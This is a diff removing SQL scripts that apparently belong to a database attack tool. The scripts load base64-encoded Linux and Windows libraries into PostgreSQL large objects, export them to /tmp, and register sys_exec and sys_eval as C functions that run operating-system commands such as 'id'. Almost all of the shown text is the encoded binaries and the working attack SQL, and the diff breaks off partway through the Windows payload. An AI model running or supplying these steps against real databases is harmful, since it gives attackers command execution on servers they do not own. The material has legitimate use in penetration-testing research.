--- UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAA/ggAAH4AAAASAAsAaAAAADoHAADEAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAAClBwAACAAAAAggAAAIAAAAWwcAAAIPAAAXCQAAAg8AAHIHAAACCwAAlw';
--- UPDATE udftest SET data=data||'cAAAILAACPCAAAAgsAAC4JAAACCwAAhwcAAAIKAADYCAAAAgoAAEMJAAACCgAArQcAAAIBAADyBwAAAgUAABoIAAACBwAAQAgAAAIIAABWCAAAAg4AAO8IAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAxwQkAQAAAOj8////iYXY+///x0QkBNQJAACJHCTo/P///4mF3Pv//8eF4Pv//wAAAADrYY298Pv//7gAAAAAuf/////yronI99CNcP+LneD7//8B84lcJASLldj7//+JFCTo/P///4mF2Pv//4l0JAiNhfD7//+';
--- UPDATE udftest SET data=data||'JRCQEi4XY+///A4Xg+///iQQk6Pz///+JneD7//+Lldz7//+JVCQIx0QkBAAEAACNhfD7//+JBCTo/P///4XAD4V3////i5Xc+///iRQk6Pz///+Lhdj7//+AOAB0C4uV4Pv//8ZEEP8Avv////+Lvdj7//+7AAAAAInxidjyrvfRg8EDiQwk6Pz///+JhdT7//+Lvdj7//+J8YnY8q730YPBA4uV1Pv//4kKi73Y+///ifHyrvfRg+kBidCDwASJTCQIi5XY+///iVQkBIkEJOj8////i4XU+///i1XwZTMVFAAAAHQF6Pz///+BxCwEAABbXl9dw1WJ5YPsGIld9Il1+Il9/ItVCItCEIkEJOj8////iceLACX///8/jXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIgMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAAAQAAANEAAAAMAAAA+AUAAA0AAAC4CQAABAAAANQAAAD1/v9viAEAAAUAAAB0AwAABgAAANQBAAAKAAAAHQEAAAsAAAAQAAAAAwAAAPQfAAACAAAAEAAAABQAAAARAAAAFwAAAOgFAAARAAAAGAUAABIAAADQAAAAEwAAAAgAAAAWAAAAAAAAAP7//2/IBAAA////bwEAAADw//9vkgQAAPr//28FAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgfAAAAAAAAAAAAAD4GAABOBgAACCAAAA';
--- UPDATE udftest SET data=data||'BHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAEdDQzogKFVidW50dSA0LjMuMi0xdWJ1bnR1MTIpIDQuMy4yAABHQ0M6IChVYnVudHUgNC4zLjItMXVidW50dTEyKSA0LjMuMgAAR0NDOiAoVWJ1bnR1IDQuMy4yLTF1YnVudHUxMikgNC4zLjIAAC5zaHN0cnRhYgAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBsdAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5qY3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8AAAAFAAAAAgAAANQAAADUAAAAtAAAAAMAAAAAAAAABAAAAAQAAAALAAAA9v//bwIAAACIAQAAiAEAAEwAAAADAAAAAAAAAAQAAAAEAAAAFQAAAAsAAAACAAAA1AEAANQBAACgAQAABAAAAAEAAAAEAAAAEAAAAB0AAAADAAAAAgAAAHQDAAB0AwAAHQEAAAAAAAAAAAAAAQAAAAAAAAAlAAAA////bwIAAACSBAAAkgQAADQAAAADAAAAAAAAAAIAAAACAAAAMgAAAP7//28CAAAAyAQAAMgEAABQAAAABAAAAAEAAAAEAAAAAAAAAEEAAAAJAAAAAgAAABgFAAAYBQAA0AAAAAMAAAAAAAAABAAAAAg';
--- UPDATE udftest SET data=data||'AAABKAAAACQAAAAIAAADoBQAA6AUAABAAAAADAAAACgAAAAQAAAAIAAAAUwAAAAEAAAAGAAAA+AUAAPgFAAAwAAAAAAAAAAAAAAAEAAAAAAAAAE4AAAABAAAABgAAACgGAAAoBgAAMAAAAAAAAAAAAAAABAAAAAQAAABZAAAAAQAAAAYAAABgBgAAYAYAAFgDAAAAAAAAAAAAABAAAAAAAAAAXwAAAAEAAAAGAAAAuAkAALgJAAAcAAAAAAAAAAAAAAAEAAAAAAAAAGUAAAABAAAAAgAAANQJAADUCQAAIAAAAAAAAAAAAAAABAAAAAAAAABtAAAAAQAAAAIAAAD0CQAA9AkAAAQAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAADAAAABB8AAAQPAAAIAAAAAAAAAAAAAAAEAAAAAAAAAH4AAAABAAAAAwAAAAwfAAAMDwAACAAAAAAAAAAAAAAABAAAAAAAAACFAAAAAQAAAAMAAAAUHwAAFA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAigAAAAYAAAADAAAAGB8AABgPAADQAAAABAAAAAAAAAAEAAAACAAAAJMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABAAAAAQAAACYAAAAAQAAAAMAAAD0HwAA9A8AABQAAAAAAAAAAAAAAAQAAAAEAAAAoQAAAAEAAAADAAAACCAAAAgQAAAEAAAAAAAAAAAAAAAEAAAAAAAAAKcAAAAIAAAAAwAAAAwgAAAMEAAACAAAAAAAAAAAAAAABAAAAAAAAACsAAAAAQAAAAAAAAAAAAAADBAAALkAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAMAAAAAAAAAAAAAAMUQAAC1AAAAAAAAAAAAAAABAAAAAAAAAA==';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
-SELECT lo_export(35817, '/tmp/lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- 
--- Notes:
--- If the library file already exists and the postgres user has write
--- access over it, it can overwrite the file
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into /var/lib/postgresql/M.m/main/lib_postgresqludf_sys.so
--- SELECT lo_export(35817, 'lib_postgresqludf_sys.so'); -- -rw-r--r-- 1 postgres postgres
--- The following would save into / (Permission denied)
--- SELECT lo_export(35817, '/lib_postgresqludf_sys.so');
-
-
--- Create two functions from the binary UDF file
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_postgresqludf_sys.txt'); -- -rw------- 1 postgres postgres
-SELECT sys_eval('cat /tmp/lib_postgresqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/command_execution/windows.sql

@@ -1,104 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- DLL compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- DLL compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.dll: 8192 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_postgresqludf_sys.dll: 6144 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- DLL compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMA+iGDSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCcR4kqVtpBAFE1UAABYLAAAAIAAAJgAAnUB2Sf64AAAQ+MPMDxEM/9/+f1NVi2wkDItFEFZXUOgbAeaL2Iszwe4Cg+4Ef/ff/Y1OAVH/FT+MVo1TBIv4UlcgCpBXxgQ3APd/7GMXhFeL8AiUg8QcO10QdAlTQkDO/tvsDQRfi8ZeXVvDbxC6/7Z9gewIBBKhAiAAM8SJhCQEDYtvsvbZBgxAEI2GLXi8fcBudIs3jNVWg8eI2FdTbXfZjmoBiTPVaGIUU4q79tvYM/+MiCBTjVQkOBZTUon/9m3sXCQ8FnyVLIXAdMpEJBSNUAGKG2tv/whAhMl1+SvCLY0sO3YjeETdH/tuUx8gUAP+VxCAi0wkJFFNLO3lsCeL/UsgdbSLXP67sbMQqFMXkPmAPgB0BcZEN/+69gPbz8Zng8AEUKvQxj6Ze+ckGI2kJAAAH40EhRDH/oXtD4kHNlCNTwRWUe+LjLD5gmuZhF0Mi8dfM8zWXTj8KfKBxFFi/yWBqAX92z88pDsNYHUC88PpCAWvi/9WaIAXYmXMXORw7a5ZWd3/f5ejI1gEVIX2dQUzwEBew4MmAFYHtit83X1oBKcJZnKpBrkLe6O1NlkjIk407FFRCv8Ku385RQx1DjkFaxB+ZXMQg30Mu4XG3QGLCRBIiw3MiQojSC3stu4PhdR9ZBcYBot5wjW7dnfbICiJPVC7HlDrGEqnBHJw';
-UPDATE udftest SET data=data||'4cH+O8d0F2joA6gsagDp/9bwrtveaOfrB8csATyhL0xqAl797d7dyQlqH5IJJus8qhDABLjHBbOufe8fKBog4CcHXOP9+75vILQEsBsaWYk1KzR3f+52WTmydQhpczA5PRVcdBxW+tu9aAYoCFxDDf91IAPDF9veCCMW//FUbAHsjzU33AgBodt4BINl/ADfJBPZ2dsP1PxvbLD2g/gCZtJZW/+gvBm2sVhLUDFZLjUPhIfXHO07xxlUE00UGNjGt38QiX0Ig+8EO8hyUYM/f/NqmG3tt5wHdOn/NyYg+BBmbbbQXLn4VhVE1rjj9htHTfhVOU0QA9C7bVv7CHS0iQkCDBoIYOun9ogxO2kM5FlELoXtK8Q4WAZMMvw//g1HkFBDm1vJwgwAahBzf3sbQxIo0MT5i/KLXQgcVOFld3vkM8lc/Il9IAj8O/FaP7YWYzk6RBfkr2g728Kb//B0BYP+AnUuoew7wXSeVl/QzizccDte5AADkxFO9uB2WgJQFBaAEgkyzloN/yf+AXUkZCBOE1fXEJsVdy9S0gYRDftrtFP3agN1Q09hhz3bNAMhaHQuLCV/8bZw4esbceyLFwmq4FBRtMKl8mQsEGXo9i/brm04+tL+/wAZBYEq5KSuPX4hncOW7Bb/O3B8hdMkahvWVDO8u1V9RFUMDQR2WV04ItpQLhAnKANfISBzc/NmQwUciRUYiR0UiTU023dzEIk9DGaMGDgGDSyzNEuzHQgFBCWsfXdLAC1//JyPFDCVVvbPn20kBwQojUUINIuF4Pygrp2NsapwlQEcGWNs69ggJBMYCWXACRyzls/dNWCJhdgyCgTcKvCNYQMUNGidBqcz/rRsWWr3GHkt77D2fRyDPSAA+SNoW9NjBWIbegYkycOAkY8L30Aecl9qFEpQ9FhISRWq+KLG4fefnBBkWetnagg3hFmP7dYdkhsnNVk04PXzHW6FvwPkUH9LdIytbT9gCn4c3BQs1uK0VypbCeAb0jpnk+Ul2wdd3Gx4/u/c';
-UPDATE udftest SET data=data||'hFnZThYGwffYG8D32FlIXX/p221WuLwYvgRXUDvGcw+LB/QOGh1TAlDNO/5y8SnkOawwJSAg7RsxEz9lMQi4TVoql39X+mY5AXQEVGRBPAPBgThQRXXviRv8+zPSuQsBHEgYD5Tfwl1+35qGLT/ZSDHID7dBDbbbEjhWBXEGM1f4b43G0ggYDXbgnBwMO/nab/D/cgmLWAgD2Tv7cgpCvCg71nLoag+H7JnbTk9q/p9w8wUcm2i1ZA7+UIPsCN1wawwlMWIzxWzwZKMLn6H0GoksSAloS/CuMzEGbMwS61WXNMvDvi0TUBkIDAg7QbjwWxskwegf9wvgAYW77dQKA08ZAFmUi+Xr2E5qlpkByj2lwPqyFuwUmS+7MSNjJ7EzPAVARPlxSSNMpRKsEOw7uQ5jCWEQxab7CwOPWe9W+TbLNttSkGwDjSvg+lgDzZn88Tyq/Ipgk2Agcw3DlQ4O42yWUUoUdT50uxnaaQH2BCAUCopW7PdYGFij7BBofjQH/8j4U1e/TuZAu3pmU6HEHXgNhcMnNZBiUmvxBOtg+3hfC8VaW4F1mJILh/DmyiBjBzQInSf9re1oGPQzDBE793UHvk8IfBffWesLhfN1o8HgEAvwxCOUPvYA99YHBF5fW7Y/mCMjI2MFnFhcYAKyIyNoVAAAlAp5AAIFALPsPmqpwRQRIwNkaAZpugNAAXJI/36JMn1REhBLUlNEU/9///9ie5Q0/rQnQb7gu040vsrDF0M6XERvY3VtZW50/9v//3MgYW5kIFNldHRpbmdzXEFkbQdpc3RyYXRvci63t/b/VzJLM1NURU5VUERBBjNlc2sWcFzt/9/+c2hhcmVcdiZ1YWxfY3BwX3Byb2plY3Q+2/+2/GxpYl9wb2cfc3FsdWRmX3N5FVLDfoH9ZWxlYXNlHS5wZGLRfC8WyLUZlwfQYF0lmw/HhQdOyWHdUQNlJ8wHYXQn7MAP2B8I6wP/IAABSfBBqSDKIiIBZt8NsRm/RP8Ag1EGjKpgApIYBVBU';
-UPDATE udftest SET data=data||'gC0oFP8vzxR4EAFHZXRDdXJyZW50//+R/1Byb2Nlc3NJZFN5c3RlbVRpbWVBc0ZpbGWt/RZ7CRgIY2tDb3UvDYu1v/1RdWVyeVADZm9ybWFuPBYO/Vv3WxhEaXNhYjNoV2FkTGlicmFW/m+/J0NhbGxzb0lzRGVidWdnZXJt2/ayuXZUU1VuaEBkMWRhMffbRXhGcHRpb25zShmgbSlbuRJUF99kbQlEYR4RSZBsc9utbQxrQJ1tcIdlR1GEteaaf3dVUSLCbNmyG1zEFXd7moUzhTxfY2l0NG3fDVhtCl80X2Ftc2cIeO9+4a8RC2RqdUJfZmRpdg1fQ3BwQPvD2lhjv7xfZGVjbwNtYcISlGkyXW0e1t4ruHkYQosy9QlMFizYbk0TD2Xt9gkjDV8bcjRfTG1tHGbX/n0YbldkX251PURtYdzCxrZjHnI0bnPY3Qzb9h0IZvJ0LK5ybrnbO4yEc/zdKnBlVeYK7ZtFD2MHtDA6twnOve9WyM6Lb29D+9ZitiJWbl90eTkctlBoDRqJFYpfcnuahS0KbEaRpHBFuODePXBnQ3RvYXNLunVt///PAlYQMBgJHxYjKgsXJBEXEQeCBgb2////FwkHBRYMHggKCxYJGBgVBQYbBQwQBgcXBiEFEQ++/2//BhQhEQsIKyIFBw0RHQ0YUy1IOAYAB9u+XU4IDAkzCgkLDFsFFr/922UWDgs0FQsYFg09BUK4BRIeFGub/90GaTIRDA4dTQUXIw0MJAgkAFPB/x/wJgY0BGAE6AgEHBwEAFL5D6t/TAEFAPohg0k04AACIQsBCcDsN2kMWwCQFQsz971HGgkLAt4e36X5ZgcDYATbzx5Ae7bsvQEqAgcGcCYHs33LZriMIlAUQE+wNdubMgBQn3fQHGWxA1nVGCFCAJsfSLovsC50ZXh0mgoestlgkAy3QmAucgmD3BrLYfsoBwgTfa85bAJALib+A23KTtOUMAInwE/7XrDGc3KA67BzGk9ujkYAUqlPjAFvSgZpUB5C';
-UPDATE udftest SET data=data||'GwDgk9uMIxKhUlMAAAAAAAAAAACQ/wAAAAAAAAAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOmnmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAA